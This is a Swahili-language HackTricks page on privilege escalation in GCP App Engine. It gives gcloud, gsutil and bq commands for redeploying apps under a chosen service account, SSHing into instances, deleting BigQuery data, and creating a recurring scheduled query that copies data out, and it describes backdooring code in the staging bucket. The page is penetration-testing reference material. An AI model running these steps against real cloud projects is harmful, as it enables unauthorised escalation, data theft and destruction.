HackTricks CloudGCP - AppEngine Privesc
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
App Engine
Kwa taarifa zaidi kuhusu App Engine angalia:
appengine.applications.get, appengine.instances.get, appengine.instances.list, appengine.operations.get, appengine.operations.list, appengine.services.get, appengine.services.list, appengine.versions.create, appengine.versions.get, appengine.versions.list, cloudbuild.builds.get,iam.serviceAccounts.actAs, resourcemanager.projects.get, storage.objects.create, storage.objects.list
Hizi ndizo ruhusa zinazohitajika ili kupeleka App kwa kutumia gcloud cli. Huenda zile get na list zisihitajike.
Unaweza kupata mifano ya code ya python katika https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine
Kwa chaguo-msingi, jina la huduma ya App litakuwa default, na inaweza kuwa tu instance 1 yenye jina hilo.
Ili kubadilisha na kuunda App ya pili, katika app.yaml, badilisha thamani ya root key kuwa kitu kama service: my-second-app
cd python-docs-samples/appengine/flexible/hello_world
gcloud app deploy #Upload and start application inside the folder
Mpe angalau dakika 10–15; ikiwa haitafanya kazi, jaribu deploy another of times na subiri dakika chache.
Note
Inawezekana kuonyesha Service Account itakayotumika lakini kwa chaguo-msingi, App Engine default SA inatumika.
URL ya programu ni kama https://<proj-name>.oa.r.appspot.com/ au https://<service_name>-dot-<proj-name>.oa.r.appspot.com
Sasisha ruhusa sawa
Unaweza kuwa na ruhusa za kutosha kusasisha AppEngine lakini sio kuunda mpya. Katika kesi hiyo, hivi ndivyo unavyoweza kusasisha App Engine iliyopo:
# Find the code of the App Engine in the buckets
gsutil ls
# Download code
mkdir /tmp/appengine2
cd /tmp/appengine2
## In this case it was found in this custom bucket but you could also use the
## buckets generated when the App Engine is created
gsutil cp gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip .
unzip labs_appengine_1_premissions_privesc.zip
## Now modify the code..
## If you don't have an app.yaml, create one like:
cat >> app.yaml <<EOF
runtime: python312
entrypoint: gunicorn -b :\$PORT main:app
env_variables:
A_VARIABLE: "value"
EOF
# Deploy the changes
gcloud app deploy
# Update the SA if you need it (and if you have actas permissions)
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
Ikiwa tayari compromised AppEngine na una ruhusa appengine.applications.update na actAs juu ya service account utakayotumia, unaweza kubadilisha service account inayotumika na AppEngine kwa:
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
Kwa ruhusa hizi, inawezekana kuingia kupitia ssh katika App Engine instances za aina ya flexible (si standard). Baadhi ya ruhusa za list na get huenda hazikutakiwa kabisa.
gcloud app instances ssh --service <app-name> --version <version-id> <ID>
appengine.applications.update, appengine.operations.get
Nadhani hii inabadilisha tu SA ya background ambayo google itatumia kusanidi applications, kwa hivyo sidhani unaweza kutumia hili vibaya kuiba service account.
gcloud app update --service-account=<sa_email>
appengine.versions.getFileContents, appengine.versions.update
Sina uhakika jinsi ya kutumia ruhusa hizi au ikiwa ni muhimu (kumbuka kwamba unapo badilisha code, toleo jipya linaundwa hivyo sijui kama unaweza tu kusasisha code au IAM role ya moja, lakini nadhani unapaswa kuwa na uwezo, labda kwa kubadilisha code ndani ya bucket??).
bigquery.tables.delete, bigquery.datasets.delete & bigquery.models.delete (bigquery.models.getMetadata)
Ili kuondoa tables, dataset au models:
# Table removal
bq rm -f -t <PROJECT_ID>.<DATASET>.<TABLE_NAME>
# Dataset removal
bq rm -r -f <PROJECT_ID>:<DATASET>
# Model removal
bq rm -m <PROJECT_ID>:<DATASET_NAME>.<MODEL_NAME>
Matumizi mabaya ya Scheduled Queries
Kwa ruhusa za bigquery.datasets.get, bigquery.jobs.create, na iam.serviceAccounts.actAs, utambulisho unaweza kuuliza metadata ya dataset, kuanzisha jobs za BigQuery, na kuzitekeleza kwa kutumia Service Account yenye vibali vya juu.
Shambulio hili linawezesha matumizi mabaya ya Scheduled Queries kuendesha queries kiotomatiki (zikifanyika chini ya Service Account iliyochaguliwa), ambayo, kwa mfano, inaweza kusababisha data nyeti kusomwa na kuandikwa kwenye table au dataset nyingine ambayo mshambuliaji ana uwezo wa kufikia—inayorahisisha exfiltration isiyo ya moja kwa moja na endelevu bila kuhitaji kutoa data nje.
Mara mshambuliaji anapojua Service Account gani ina ruhusa zinazohitajika kutekeleza query inayotaka, anaweza kuunda usanidi wa Scheduled Query unaotekelezwa kwa kutumia Service Account hiyo na mara kwa mara kuandika matokeo kwenye dataset anayoichagua.
bq mk \
--transfer_config \
--project_id=<PROJECT_ID> \
--location=US \
--data_source=scheduled_query \
--target_dataset=<DEST_DATASET> \
--display_name="Generic Scheduled Query" \
--service_account_name="<SERVICE_ACCOUNT>@<PROJECT_ID>.iam.gserviceaccount.com" \
--schedule="every 10 minutes" \
--params='{
"query": "SELECT * FROM `<PROJECT_ID>.<SOURCE_DATASET>.<source_table>`;",
"destination_table_name_template": "<destination_table>",
"write_disposition": "WRITE_TRUNCATE"
}'
Ufikiaji wa Kuandika kwenye buckets
Kama ilivyoelezwa appengine versions zinatengeneza baadhi ya data ndani ya bucket yenye jina la muundo: staging.<project-id>.appspot.com. Kumbuka kwamba haiwezekani pre-takeover ya bucket hii kwa sababu watumiaji wa GCP hawaruhusiwi kuunda buckets kwa kutumia domain appspot.com.
Hata hivyo, kwa ufikiaji wa kusoma & kuandika kwenye bucket hii, inawezekana kuinua mamlaka kwa SA inayounganishwa na AppEngine version kwa kusimamia bucket na kila wakati mabadiliko yapofanyika, kubadilisha code haraka iwezekanavyo. Kwa njia hii, container inayoundwa kutoka kwa code hii ita execute the backdoored code.
Kwa maelezo zaidi na PoC angalia taarifa zinazofaa kutoka kurasa hii:
Ufikiaji wa Kuandika kwenye Artifact Registry
Ingawa App Engine huunda docker images ndani ya Artifact Registry. Ilijaribiwa kuwa hata ukibadilisha image ndani ya huduma hii na ukiondoa instance ya App Engine (hivyo mpya ikitekelezwa) code inayotekelezwa haibadiliki.
Inawezekana kwamba kwa kufanya Race Condition attack, kama ilivyo kwa buckets, inaweza kuwa inawezekana kuandika tena (overwrite) code inayotekelezwa, lakini hili halikujaribiwa.
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.